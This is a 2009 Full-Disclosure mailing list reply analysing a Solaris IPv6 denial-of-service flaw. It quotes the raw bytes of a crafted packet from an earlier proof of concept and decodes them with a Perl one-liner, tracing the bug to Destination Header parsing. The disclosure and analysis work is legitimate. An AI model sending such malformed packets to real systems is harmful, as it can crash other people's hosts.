[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Solaris IPv6 DoS vulnerabilities (was: Solaris Devs Are Smoking Pot)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Solaris IPv6 DoS vulnerabilities (was: Solaris Devs Are Smoking Pot)
- From: GomoR <fd@xxxxxxxxx>
- Date: Fri, 30 Jan 2009 14:49:16 +0100
On Mon, Jan 26, 2009 at 08:23:45AM +0100, Kingcope Kingcope wrote:
[..]
> unsigned char rawData[] =
> "\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
> "\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
> "\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";
[..]
% perl -MNet::Frame::Simple -e 'print Net::Frame::Simple->new(raw =>
"\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0c\x29\xff\xfe\xf1\x1e\xbb",firstLayer
=> 'IPv6')->print."\n"'
Unable to unpack next layer, not yet implemented in layer: 0:IPv6
IPv6: version:6 trafficClass:0x0f flowLabel:0xc5729 nextHeader:0x3c
IPv6: payloadLength:0 hopLimit:86
IPv6: src:6f35:4072:702f:5258:cc95:1279:30bb:be25 dst:fe80::20c:29ff:fef1:1ebb
So this vulnerability is due to an implementation flaw in the
parsing of IPv6 Destination Header (0x3c). Of course, there is
no IPv6 DH to parse :)
This vulnerability only exists when setting next header to 0x3c
or does it work with other values ?
My guess is that we have a more general issue here.
--
^ ___ ___ http://www.GomoR.org/ <-+
| / __ |__/ Research Engineer |
| \__/ | \ ---[ zsh$ alias psed='perl -pe ' ]--- |
+--> Net::Frame <=> http://search.cpan.org/~gomor/ <---+
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/